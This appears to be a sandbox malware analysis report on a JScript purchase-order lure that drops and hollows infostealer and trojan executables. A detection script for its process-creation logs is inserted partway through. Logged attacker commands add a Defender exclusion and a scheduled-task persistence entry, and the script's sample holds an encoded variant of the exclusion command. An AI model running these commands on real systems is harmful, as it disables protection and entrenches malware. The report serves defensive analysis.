                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_00444FD24_2_00444FD2
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_04845CB04_2_04845CB0
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_049376286_2_04937628
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 9_2_04B5C6289_2_04B5C628
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 13_2_04B5B62813_2_04B5B628
                                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 15_2_049A962815_2_049A9628
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F751EE16_2_00F751EE
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FB39A316_2_00FB39A3
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F76EAF16_2_00F76EAF
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FA598016_2_00FA5980
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FB515C16_2_00FB515C
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FAD58016_2_00FAD580
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FAC7F016_2_00FAC7F0
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00F77F8016_2_00F77F80
                                Source: C:\Windows\SysWOW64\svchost.exeCode function: 16_2_00FA378016_2_00FA3780
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 17_2_032085B717_2_032085B7
                                Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeCode function: 17_2_032085C817_2_032085C8
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_030DDC7419_2_030DDC74
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058EEE5819_2_058EEE58
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E885019_2_058E8850
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E0AFC19_2_058E0AFC
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E000619_2_058E0006
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E004019_2_058E0040
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E884019_2_058E8840
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E0AF919_2_058E0AF9
                                Source: C:\Users\user\AppData\Local\Temp\build.exeCode function: 19_2_058E1FF019_2_058E1FF0
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0299B08820_2_0299B088
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0299B07820_2_0299B078
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_082D3E9820_2_082D3E98
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\build.exe 0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\neworigin.exe DC441006CB45C2CFAC6C521F6CD4C16860615D21081563BD9E368DE6F7E8AB6B
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 0040E710 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 00401B10 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 00408F40 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 004301F8 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 004115D7 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 00416C70 appears 78 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 004181F2 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 00445AE0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 0041341F appears 36 times
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: String function 00422240 appears 38 times
Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | Initial sample: Strings found which are bigger than 50
Source: 16.2.svchost.exe.314b000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: 16.2.svchost.exe.3112000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: 16.2.svchost.exe.314b000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: 18.0.neworigin.exe.e60000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID (author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers)
Source: neworigin.exe.16.dr, cPs8D.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.16.dr, 72CF8egH.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.16.dr, G5CXsdn.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.16.dr, 3uPsILA6U.cs | Cryptographic APIs: 'CreateDecryptor'
Source: neworigin.exe.16.dr, 6oQOw74dfIt.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.16.dr, aMIWm.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: neworigin.exe.16.dr, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: neworigin.exe.16.dr, 3QjbQ514BDx.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: svchost.exe | Binary or memory string: CMD;.VBS;.VBpt-brh
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winJS@48/18@3/3
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_0044AF6C GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 4_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Local\Temp\x.exe | Code function: 2_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 16_2_00F9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW
Source: C:\Windows\SysWOW64\svchost.exe | File created: C:\Users\user\AppData\Roaming\bb5c1732d3a25be8.bin
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2452:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe | Mutant created: \Sessions\1\BaseNamedObjects\kbedaSzAAOYDRDgN
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5736:120:WilError_03
Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-bb5c1732d3a25be83d78ffaf-b
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_03
Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-bb5c1732d3a25be8-inf
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\x.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe | Command line argument: Wu (2_2_0040D6B0)
Source: C:\Users\user\AppData\Local\Temp\x.exe | Command line argument: Wu (4_2_0040D6B0)
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\build.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RFQ -PO.20571-0001-QBMS-PRQ-0200140.js | ReversingLabs: Detection: 23%
Source: C:\Windows\SysWOW64\svchost.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
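The process-creation lines above read as one chain: wscript.exe writes and starts x.exe from the user's Temp folder, x.exe starts a SysWOW64 svchost.exe whose command line still names x.exe (the created image is not the code that ends up running), that svchost.exe drops server_BTC.exe, neworigin.exe and build.exe, and server_BTC.exe adds a Defender exclusion for its install folder and a daily scheduled task pointing into AppData before launching TrojanAIbot.exe. The script below is an added example written for this report, not Joe Sandbox code: it parses "Process created" lines of this shape, rebuilds the parent chain and flags those four behaviours. A subset of the report's own lines is embedded as constructed sample input, plus one constructed line (not in the report) that carries the same Add-MpPreference cmdlet behind -EncodedCommand, since a base64-wrapped form has to be decoded before any string match can see the cmdlet. Rule names, the user-writable path list and the regular expressions are this example's own assumptions, not Joe Sandbox or Sigma rule logic.

```python
"""Triage the 'Process created' evidence of a Joe Sandbox report.
Added example (not Joe Sandbox code): rule names, path lists and regexes
below are this example's own assumptions."""
import base64
import binascii
import re

# Constructed sample input: a subset of the report's 'Process created' lines.
SAMPLE = r"""
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ -PO.20571-0001-QBMS-PRQ-0200140.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
"""
# Constructed variant (not in the report): the same cmdlet behind -EncodedCommand,
# which a detection has to base64/UTF-16LE decode before matching.
ENCODED_CMDLET = base64.b64encode(
    "Add-MpPreference -ExclusionPath 'C:\\Users\\user\\AppData\\Roaming\\ACCApi'".encode("utf-16-le")).decode()
SAMPLE += ("Source: C:\\Users\\user\\AppData\\Local\\Temp\\server_BTC.exe Process created: "
           "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe powershell.exe "
           "-EncodedCommand " + ENCODED_CMDLET + "\n")

# Matches 'Source: X Process created: image cmdline' and the 'X | Process created:' layout.
LINE_RE = re.compile(r"^Source:\s*(?P<parent>.+?)\s*\|?\s*Process created:\s*(?P<image>\S+)\s*(?P<cmdline>.*)$")
SCRIPT_HOSTS = {"wscript", "cscript", "mshta"}
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

def parse(text):
    """Yield (parent_image, child_image, cmdline) for each process-creation line."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m["parent"], m["image"], m["cmdline"]

def stem(path):
    """Lower-case file name without a trailing .exe, for comparing images."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def first_token(cmdline):
    """argv[0] of a command line, honouring a double-quoted first element."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(None, 1)[0] if s else ""

def powershell_script(cmdline):
    """Script text a powershell.exe line runs: inline, or decoded from -e/-enc/-EncodedCommand."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{8,})", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", "replace")
    except (binascii.Error, ValueError):
        return cmdline

def analyze(text):
    """Return (rule, parent_image, child_image) findings for the lines in text."""
    findings = []
    for parent, child, cmdline in parse(text):
        parent_user = any(p in parent.lower() for p in USER_WRITABLE)
        child_user = any(p in child.lower() for p in USER_WRITABLE)
        if stem(parent) in SCRIPT_HOSTS and child_user:
            findings.append(("script_host_launches_dropped_exe", parent, child))
        # A system binary was created, but its command line names another executable:
        # the x.exe -> svchost.exe pattern, where the created image is not what runs.
        if child.lower().startswith(SYSTEM_DIRS) and parent_user \
                and stem(first_token(cmdline)) not in ("", stem(child)):
            findings.append(("system_image_foreign_cmdline", parent, child))
        if stem(child) == "powershell" and re.search(
                r"add-mppreference\b.*-exclusion", powershell_script(cmdline), re.I):
            findings.append(("defender_exclusion_added", parent, child))
        if stem(child) == "schtasks" and re.search(r"/create\b", cmdline, re.I):
            tr = re.search(r'/tr\s+"?([^"]+?)"?(?:\s+/|$)', cmdline, re.I)
            if tr and any(p in tr.group(1).lower() for p in USER_WRITABLE):
                findings.append(("scheduled_task_runs_user_path", parent, child))
    return findings

def lineage(text, image):
    """Ancestor chain of image (by image path); first parent seen wins, self-spawn loops stop it."""
    parent_of = {}
    for parent, child, _ in parse(text):
        parent_of.setdefault(child.lower(), parent)
    chain, seen = [image], {image.lower()}
    while chain[-1].lower() in parent_of and parent_of[chain[-1].lower()].lower() not in seen:
        chain.append(parent_of[chain[-1].lower()])
        seen.add(chain[-1].lower())
    return chain

if __name__ == "__main__":
    for rule, parent, child in analyze(SAMPLE):
        print(f"{rule:32} {stem(parent):>12} -> {child}")
    print(" <- ".join(stem(p) for p in lineage(SAMPLE, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe")))
```

Run with python3 and it prints five findings (the dropped x.exe, the svchost.exe with x.exe's command line, both Defender-exclusion lines and the AppData scheduled task) and the ancestry of powershell.exe back through server_BTC.exe, svchost.exe and x.exe to wscript.exe. The "system_image_foreign_cmdline" rule is the cheapest hollowing heuristic available from process-creation telemetry alone, since it needs only the created image path and the command line it was given; the lineage walk keys on image path rather than PID because the report identifies processes by path, so it stops at the first repeat to survive the x.exe -> x.exe self-spawns listed above.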
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe | Section loaded: uxtheme.dll
